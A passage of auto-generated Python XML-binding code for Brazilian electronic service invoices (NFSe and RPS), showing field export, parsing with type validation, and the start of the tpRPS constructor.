outfile.write('<ns1:BairroTomador>%s</ns1:BairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.BairroTomador), input_name='BairroTomador')), eol_))
if self.CidadeTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomador>%s</ns1:CidadeTomador>%s' % (self.gds_format_integer(self.CidadeTomador, input_name='CidadeTomador'), eol_))
if self.CidadeTomadorDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomadorDescricao>%s</ns1:CidadeTomadorDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CidadeTomadorDescricao), input_name='CidadeTomadorDescricao')), eol_))
if self.CEPTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CEPTomador>%s</ns1:CEPTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CEPTomador), input_name='CEPTomador')), eol_))
if self.EmailTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:EmailTomador>%s</ns1:EmailTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.EmailTomador), input_name='EmailTomador')), eol_))
if self.CodigoAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoAtividade>%s</ns1:CodigoAtividade>%s' % (self.gds_format_integer(self.CodigoAtividade, input_name='CodigoAtividade'), eol_))
if self.AliquotaAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaAtividade>%s</ns1:AliquotaAtividade>%s' % (self.gds_format_float(self.AliquotaAtividade, input_name='AliquotaAtividade'), eol_))
if self.TipoRecolhimento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRecolhimento>%s</ns1:TipoRecolhimento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRecolhimento), input_name='TipoRecolhimento')), eol_))
if self.MunicipioPrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacao>%s</ns1:MunicipioPrestacao>%s' % (self.gds_format_integer(self.MunicipioPrestacao, input_name='MunicipioPrestacao'), eol_))
if self.MunicipioPrestacaoDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacaoDescricao>%s</ns1:MunicipioPrestacaoDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MunicipioPrestacaoDescricao), input_name='MunicipioPrestacaoDescricao')), eol_))
if self.Operacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Operacao>%s</ns1:Operacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Operacao), input_name='Operacao')), eol_))
if self.Tributacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Tributacao>%s</ns1:Tributacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Tributacao), input_name='Tributacao')), eol_))
if self.ValorPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorPIS>%s</ns1:ValorPIS>%s' % (self.gds_format_float(self.ValorPIS, input_name='ValorPIS'), eol_))
if self.ValorCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCOFINS>%s</ns1:ValorCOFINS>%s' % (self.gds_format_float(self.ValorCOFINS, input_name='ValorCOFINS'), eol_))
if self.ValorINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorINSS>%s</ns1:ValorINSS>%s' % (self.gds_format_float(self.ValorINSS, input_name='ValorINSS'), eol_))
if self.ValorIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorIR>%s</ns1:ValorIR>%s' % (self.gds_format_float(self.ValorIR, input_name='ValorIR'), eol_))
if self.ValorCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCSLL>%s</ns1:ValorCSLL>%s' % (self.gds_format_float(self.ValorCSLL, input_name='ValorCSLL'), eol_))
if self.AliquotaPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaPIS>%s</ns1:AliquotaPIS>%s' % (self.gds_format_float(self.AliquotaPIS, input_name='AliquotaPIS'), eol_))
if self.AliquotaCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCOFINS>%s</ns1:AliquotaCOFINS>%s' % (self.gds_format_float(self.AliquotaCOFINS, input_name='AliquotaCOFINS'), eol_))
if self.AliquotaINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaINSS>%s</ns1:AliquotaINSS>%s' % (self.gds_format_float(self.AliquotaINSS, input_name='AliquotaINSS'), eol_))
if self.AliquotaIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaIR>%s</ns1:AliquotaIR>%s' % (self.gds_format_float(self.AliquotaIR, input_name='AliquotaIR'), eol_))
if self.AliquotaCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCSLL>%s</ns1:AliquotaCSLL>%s' % (self.gds_format_float(self.AliquotaCSLL, input_name='AliquotaCSLL'), eol_))
if self.DescricaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DescricaoRPS>%s</ns1:DescricaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DescricaoRPS), input_name='DescricaoRPS')), eol_))
if self.DDDPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDPrestador>%s</ns1:DDDPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDPrestador), input_name='DDDPrestador')), eol_))
if self.TelefonePrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefonePrestador>%s</ns1:TelefonePrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefonePrestador), input_name='TelefonePrestador')), eol_))
if self.DDDTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDTomador>%s</ns1:DDDTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDTomador), input_name='DDDTomador')), eol_))
if self.TelefoneTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefoneTomador>%s</ns1:TelefoneTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefoneTomador), input_name='TelefoneTomador')), eol_))
if self.MotCancelamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MotCancelamento>%s</ns1:MotCancelamento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MotCancelamento), input_name='MotCancelamento')), eol_))
if self.CPFCNPJIntermediario is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJIntermediario>%s</ns1:CPFCNPJIntermediario>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJIntermediario), input_name='CPFCNPJIntermediario')), eol_))
if self.Deducoes is not None:
self.Deducoes.export(outfile, level, namespace_, name_='Deducoes', pretty_print=pretty_print)
if self.Itens is not None:
self.Itens.export(outfile, level, namespace_, name_='Itens', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'NumeroNota':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNota')
self.NumeroNota = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroNota)
elif nodeName_ == 'DataProcessamento':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataProcessamento = dval_
elif nodeName_ == 'NumeroLote':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroLote')
self.NumeroLote = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroLote)
elif nodeName_ == 'CodigoVerificacao':
CodigoVerificacao_ = child_.text
CodigoVerificacao_ = self.gds_validate_string(CodigoVerificacao_, node, 'CodigoVerificacao')
self.CodigoVerificacao = CodigoVerificacao_
# validate type tpCodigoVerificacao
self.validate_tpCodigoVerificacao(self.CodigoVerificacao)
elif nodeName_ == 'Assinatura':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Assinatura')
else:
bval_ = None
self.Assinatura = bval_
# validate type tpAssinatura
self.validate_tpAssinatura(self.Assinatura)
elif nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
elif nodeName_ == 'TipoRPS':
TipoRPS_ = child_.text
TipoRPS_ = self.gds_validate_string(TipoRPS_, node, 'TipoRPS')
self.TipoRPS = TipoRPS_
# validate type tpTipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
# validate type tpDataHora
self.validate_tpDataHora(self.DataEmissaoRPS)
elif nodeName_ == 'SituacaoRPS':
SituacaoRPS_ = child_.text
SituacaoRPS_ = self.gds_validate_string(SituacaoRPS_, node, 'SituacaoRPS')
self.SituacaoRPS = SituacaoRPS_
# validate type tpSituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
elif nodeName_ == 'SerieRPSSubstituido':
SerieRPSSubstituido_ = child_.text
SerieRPSSubstituido_ = self.gds_validate_string(SerieRPSSubstituido_, node, 'SerieRPSSubstituido')
self.SerieRPSSubstituido = SerieRPSSubstituido_
# validate type tpSerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
elif nodeName_ == 'NumeroRPSSubstituido':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPSSubstituido')
self.NumeroRPSSubstituido = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
elif nodeName_ == 'NumeroNFSeSubstituida':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFSeSubstituida')
self.NumeroNFSeSubstituida = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
elif nodeName_ == 'DataEmissaoNFSeSubstituida':
DataEmissaoNFSeSubstituida_ = child_.text
DataEmissaoNFSeSubstituida_ = self.gds_validate_string(DataEmissaoNFSeSubstituida_, node, 'DataEmissaoNFSeSubstituida')
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida_
# validate type tpDataHoraNulo
self.validate_tpDataHoraNulo(self.DataEmissaoNFSeSubstituida)
elif nodeName_ == 'SeriePrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'SeriePrestacao')
self.SeriePrestacao = ival_
# validate type tpSeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
elif nodeName_ == 'InscricaoMunicipalTomador':
InscricaoMunicipalTomador_ = child_.text
InscricaoMunicipalTomador_ = self.gds_validate_string(InscricaoMunicipalTomador_, node, 'InscricaoMunicipalTomador')
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador_
# validate type tpInscricaoMunicipalNulo
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
elif nodeName_ == 'CPFCNPJTomador':
CPFCNPJTomador_ = child_.text
CPFCNPJTomador_ = self.gds_validate_string(CPFCNPJTomador_, node, 'CPFCNPJTomador')
self.CPFCNPJTomador = CPFCNPJTomador_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
elif nodeName_ == 'RazaoSocialTomador':
RazaoSocialTomador_ = child_.text
RazaoSocialTomador_ = self.gds_validate_string(RazaoSocialTomador_, node, 'RazaoSocialTomador')
self.RazaoSocialTomador = RazaoSocialTomador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
elif nodeName_ == 'DocTomadorEstrangeiro':
DocTomadorEstrangeiro_ = child_.text
DocTomadorEstrangeiro_ = self.gds_validate_string(DocTomadorEstrangeiro_, node, 'DocTomadorEstrangeiro')
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro_
# validate type tpDocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
elif nodeName_ == 'TipoLogradouroTomador':
TipoLogradouroTomador_ = child_.text
TipoLogradouroTomador_ = self.gds_validate_string(TipoLogradouroTomador_, node, 'TipoLogradouroTomador')
self.TipoLogradouroTomador = TipoLogradouroTomador_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
elif nodeName_ == 'LogradouroTomador':
LogradouroTomador_ = child_.text
LogradouroTomador_ = self.gds_validate_string(LogradouroTomador_, node, 'LogradouroTomador')
self.LogradouroTomador = LogradouroTomador_
# validate type tpLogradouro
self.validate_tpLogradouro(self.LogradouroTomador)
elif nodeName_ == 'NumeroEnderecoTomador':
NumeroEnderecoTomador_ = child_.text
NumeroEnderecoTomador_ = self.gds_validate_string(NumeroEnderecoTomador_, node, 'NumeroEnderecoTomador')
self.NumeroEnderecoTomador = NumeroEnderecoTomador_
# validate type tpNumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
elif nodeName_ == 'ComplementoEnderecoTomador':
ComplementoEnderecoTomador_ = child_.text
ComplementoEnderecoTomador_ = self.gds_validate_string(ComplementoEnderecoTomador_, node, 'ComplementoEnderecoTomador')
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador_
# validate type tpComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
elif nodeName_ == 'TipoBairroTomador':
TipoBairroTomador_ = child_.text
TipoBairroTomador_ = self.gds_validate_string(TipoBairroTomador_, node, 'TipoBairroTomador')
self.TipoBairroTomador = TipoBairroTomador_
# validate type tpTipoBairro
self.validate_tpTipoBairro(self.TipoBairroTomador)
elif nodeName_ == 'BairroTomador':
BairroTomador_ = child_.text
BairroTomador_ = self.gds_validate_string(BairroTomador_, node, 'BairroTomador')
self.BairroTomador = BairroTomador_
# validate type tpBairro
self.validate_tpBairro(self.BairroTomador)
elif nodeName_ == 'CidadeTomador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CidadeTomador')
self.CidadeTomador = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.CidadeTomador)
elif nodeName_ == 'CidadeTomadorDescricao':
CidadeTomadorDescricao_ = child_.text
CidadeTomadorDescricao_ = self.gds_validate_string(CidadeTomadorDescricao_, node, 'CidadeTomadorDescricao')
self.CidadeTomadorDescricao = CidadeTomadorDescricao_
# validate type tpCidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
elif nodeName_ == 'CEPTomador':
CEPTomador_ = child_.text
CEPTomador_ = self.gds_validate_string(CEPTomador_, node, 'CEPTomador')
self.CEPTomador = CEPTomador_
# validate type tpCEPNulo
self.validate_tpCEPNulo(self.CEPTomador)
elif nodeName_ == 'EmailTomador':
EmailTomador_ = child_.text
EmailTomador_ = self.gds_validate_string(EmailTomador_, node, 'EmailTomador')
self.EmailTomador = EmailTomador_
# validate type tpEmail
self.validate_tpEmail(self.EmailTomador)
elif nodeName_ == 'CodigoAtividade':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'CodigoAtividade')
self.CodigoAtividade = ival_
# validate type tpCodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
elif nodeName_ == 'AliquotaAtividade':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaAtividade')
self.AliquotaAtividade = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaAtividade)
elif nodeName_ == 'TipoRecolhimento':
TipoRecolhimento_ = child_.text
TipoRecolhimento_ = self.gds_validate_string(TipoRecolhimento_, node, 'TipoRecolhimento')
self.TipoRecolhimento = TipoRecolhimento_
# validate type tpTipoRecolhimento
self.validate_tpTipoRecolhimento(self.TipoRecolhimento)
elif nodeName_ == 'MunicipioPrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'MunicipioPrestacao')
self.MunicipioPrestacao = ival_
# validate type tpCodCidade
self.validate_tpCodCidade(self.MunicipioPrestacao)
elif nodeName_ == 'MunicipioPrestacaoDescricao':
MunicipioPrestacaoDescricao_ = child_.text
MunicipioPrestacaoDescricao_ = self.gds_validate_string(MunicipioPrestacaoDescricao_, node, 'MunicipioPrestacaoDescricao')
self.MunicipioPrestacaoDescricao = MunicipioPrestacaoDescricao_
# validate type tpCidadeDescricao
self.validate_tpCidadeDescricao(self.MunicipioPrestacaoDescricao)
elif nodeName_ == 'Operacao':
Operacao_ = child_.text
Operacao_ = self.gds_validate_string(Operacao_, node, 'Operacao')
self.Operacao = Operacao_
# validate type tpOperacao
self.validate_tpOperacao(self.Operacao)
elif nodeName_ == 'Tributacao':
Tributacao_ = child_.text
Tributacao_ = self.gds_validate_string(Tributacao_, node, 'Tributacao')
self.Tributacao = Tributacao_
# validate type tpTributacao
self.validate_tpTributacao(self.Tributacao)
elif nodeName_ == 'ValorPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorPIS')
self.ValorPIS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorPIS)
elif nodeName_ == 'ValorCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCOFINS')
self.ValorCOFINS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCOFINS)
elif nodeName_ == 'ValorINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorINSS')
self.ValorINSS = fval_
# validate type tpValor
self.validate_tpValor(self.ValorINSS)
elif nodeName_ == 'ValorIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorIR')
self.ValorIR = fval_
# validate type tpValor
self.validate_tpValor(self.ValorIR)
elif nodeName_ == 'ValorCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'ValorCSLL')
self.ValorCSLL = fval_
# validate type tpValor
self.validate_tpValor(self.ValorCSLL)
elif nodeName_ == 'AliquotaPIS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaPIS')
self.AliquotaPIS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaPIS)
elif nodeName_ == 'AliquotaCOFINS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCOFINS')
self.AliquotaCOFINS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCOFINS)
elif nodeName_ == 'AliquotaINSS':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaINSS')
self.AliquotaINSS = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaINSS)
elif nodeName_ == 'AliquotaIR':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaIR')
self.AliquotaIR = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaIR)
elif nodeName_ == 'AliquotaCSLL':
sval_ = child_.text
try:
fval_ = float(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires float or double: %s' % exp)
fval_ = self.gds_validate_float(fval_, node, 'AliquotaCSLL')
self.AliquotaCSLL = fval_
# validate type tpAliquota
self.validate_tpAliquota(self.AliquotaCSLL)
elif nodeName_ == 'DescricaoRPS':
DescricaoRPS_ = child_.text
DescricaoRPS_ = self.gds_validate_string(DescricaoRPS_, node, 'DescricaoRPS')
self.DescricaoRPS = DescricaoRPS_
# validate type tpDescricaoRPS
self.validate_tpDescricaoRPS(self.DescricaoRPS)
elif nodeName_ == 'DDDPrestador':
DDDPrestador_ = child_.text
DDDPrestador_ = self.gds_validate_string(DDDPrestador_, node, 'DDDPrestador')
self.DDDPrestador = DDDPrestador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDPrestador)
elif nodeName_ == 'TelefonePrestador':
TelefonePrestador_ = child_.text
TelefonePrestador_ = self.gds_validate_string(TelefonePrestador_, node, 'TelefonePrestador')
self.TelefonePrestador = TelefonePrestador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefonePrestador)
elif nodeName_ == 'DDDTomador':
DDDTomador_ = child_.text
DDDTomador_ = self.gds_validate_string(DDDTomador_, node, 'DDDTomador')
self.DDDTomador = DDDTomador_
# validate type tpDDDNulo
self.validate_tpDDDNulo(self.DDDTomador)
elif nodeName_ == 'TelefoneTomador':
TelefoneTomador_ = child_.text
TelefoneTomador_ = self.gds_validate_string(TelefoneTomador_, node, 'TelefoneTomador')
self.TelefoneTomador = TelefoneTomador_
# validate type tpFoneNulo
self.validate_tpFoneNulo(self.TelefoneTomador)
elif nodeName_ == 'MotCancelamento':
MotCancelamento_ = child_.text
MotCancelamento_ = self.gds_validate_string(MotCancelamento_, node, 'MotCancelamento')
self.MotCancelamento = MotCancelamento_
# validate type tpMotCancelamento
self.validate_tpMotCancelamento(self.MotCancelamento)
elif nodeName_ == 'CPFCNPJIntermediario':
CPFCNPJIntermediario_ = child_.text
CPFCNPJIntermediario_ = self.gds_validate_string(CPFCNPJIntermediario_, node, 'CPFCNPJIntermediario')
self.CPFCNPJIntermediario = CPFCNPJIntermediario_
# validate type tpCPFCNPJnulo
self.validate_tpCPFCNPJnulo(self.CPFCNPJIntermediario)
elif nodeName_ == 'Deducoes':
obj_ = tpListaDeducoes.factory()
obj_.build(child_)
self.Deducoes = obj_
obj_.original_tagname_ = 'Deducoes'
elif nodeName_ == 'Itens':
obj_ = tpListaItens.factory()
obj_.build(child_)
self.Itens = obj_
obj_.original_tagname_ = 'Itens'
# end class tpNFSe
class tpRPS(GeneratedsSuper):
"""Tipo que representa um RPS."""
subclass = None
superclass = None
def __init__(self, Id=None, Assinatura=None, InscricaoMunicipalPrestador=None, RazaoSocialPrestador=None, TipoRPS=None, SerieRPS=None, NumeroRPS=None, DataEmissaoRPS=None, SituacaoRPS=None, SerieRPSSubstituido=None, NumeroRPSSubstituido=None, NumeroNFSeSubstituida=None, DataEmissaoNFSeSubstituida=None, SeriePrestacao=None, InscricaoMunicipalTomador=None, CPFCNPJTomador=None, RazaoSocialTomador=None, DocTomadorEstrangeiro=None, TipoLogradouroTomador=None, LogradouroTomador=None, NumeroEnderecoTomador=None, ComplementoEnderecoTomador=None, TipoBairroTomador=None, BairroTomador=None, CidadeTomador=None, CidadeTomadorDescricao=None, CEPTomador=None, EmailTomador=None, CodigoAtividade=None, AliquotaAtividade=None, TipoRecolhimento=None, MunicipioPrestacao=None, MunicipioPrestacaoDescricao=None, Operacao=None, Tributacao=None, ValorPIS=None, ValorCOFINS=None, ValorINSS=None, ValorIR=None, ValorCSLL=None, AliquotaPIS=None, AliquotaCOFINS=None, AliquotaINSS=None, AliquotaIR=None, AliquotaCSLL=None, DescricaoRPS=None, DDDPrestador=None, TelefonePrestador=None, DDDTomador=None, TelefoneTomador=None, MotCancelamento=None, CPFCNPJIntermediario=None, Deducoes=None, Itens=None):
self.original_tagname_ = None
self.Id = _cast(None, Id)
self.Assinatura = Assinatura
self.validate_tpAssinatura(self.Assinatura)
self.InscricaoMunicipalPrestador = InscricaoMunicipalPrestador
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
self.RazaoSocialPrestador = RazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
self.TipoRPS = TipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
self.SerieRPS = SerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
self.NumeroRPS = NumeroRPS
self.validate_tpNumero(self.NumeroRPS)
if isinstance(DataEmissaoRPS, BaseStrType_):
initvalue_ = datetime_.datetime.strptime(DataEmissaoRPS, '%Y-%m-%dT%H:%M:%S')
else:
initvalue_ = DataEmissaoRPS
self.DataEmissaoRPS = initvalue_
self.SituacaoRPS = SituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
self.SerieRPSSubstituido = SerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
self.NumeroRPSSubstituido = NumeroRPSSubstituido
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
self.NumeroNFSeSubstituida = NumeroNFSeSubstituida
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida
self.validate_tpDataNulo(self.DataEmissaoNFSeSubstituida)
self.SeriePrestacao = SeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
self.CPFCNPJTomador = CPFCNPJTomador
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
self.RazaoSocialTomador = RazaoSocialTomador
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
self.TipoLogradouroTomador = TipoLogradouroTomador
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
self.LogradouroTomador = LogradouroTomador
self.validate_tpLogradouro(self.LogradouroTomador)
self.NumeroEnderecoTomador = NumeroEnderecoTomador
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
self.TipoBairroTomador = TipoBairroTomador
self.validate_tpTipoBairro(self.TipoBairroTomador)
self.BairroTomador = BairroTomador
self.validate_tpBairro(self.BairroTomador)
self.CidadeTomador = CidadeTomador
self.validate_tpCodCidade(self.CidadeTomador)
self.CidadeTomadorDescricao = CidadeTomadorDescricao
self.validate_tpCidadeTomadorDescricao(self.CidadeTomadorDescricao)
self.CEPTomador = CEPTomador
self.validate_tpCEP(self.CEPTomador)
self.EmailTomador = EmailTomador
self.validate_tpEmail(self.EmailTomador)
self.CodigoAtividade = CodigoAtividade
self.validate_tpCodigoAtividade(self.CodigoAtividade)
self.AliquotaAtividade = AliquotaAtividade
